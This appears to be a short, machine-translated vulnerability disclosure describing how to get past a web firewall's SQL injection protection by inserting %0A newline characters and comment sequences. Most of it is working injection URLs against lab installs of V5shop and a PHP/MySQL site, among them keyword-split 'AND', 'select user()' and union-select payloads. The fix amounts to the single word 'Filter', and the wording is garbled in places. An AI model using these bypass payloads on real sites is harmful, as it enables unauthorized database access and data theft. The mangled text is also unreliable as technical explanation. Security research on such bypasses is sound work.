Dongle SQL Injection Protection Policy Bypass Vulnerability

Dongle SQL Injection Protection Policy Bypass Vulnerability

 

Dongle Bypass Vulnerability: attackers can bypass a character directly. In some special cases, they must be used with annotator.

Core character used for bypass: % 0A, which must be used with annotator in some special cases.

% 0A is just an idea, and the divergence is that multiple % 0A overlays, or is used together with the annotator -,/**/

 

1. The local machine is installed with the injected V5shop (the architecture is IIS6 + ASPX + MSSQL2005 to test the IIS version of the secure dog). The general injection test is as follows:

http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

 

AND is recognized AND intercepted as a keyword.



2. Add % 0A and try again:
 

http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user

 

Bypass and inject.

In the Apache + php + Mysql environment:

First, try the injection as usual:
 

http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

 

Because and user () are all keywords in the blacklist. Then join % 0A and try again:
 

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

 

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

 

Of course, % 0A is just an idea, and the divergence is that multiple % 0A overlays, or mixed with the annotator. For example:
 

http://192.168.91.152:8000/About.php?did=-2%0Aunion–%0Aselect%0Auser()

 

 

Solution:

Filter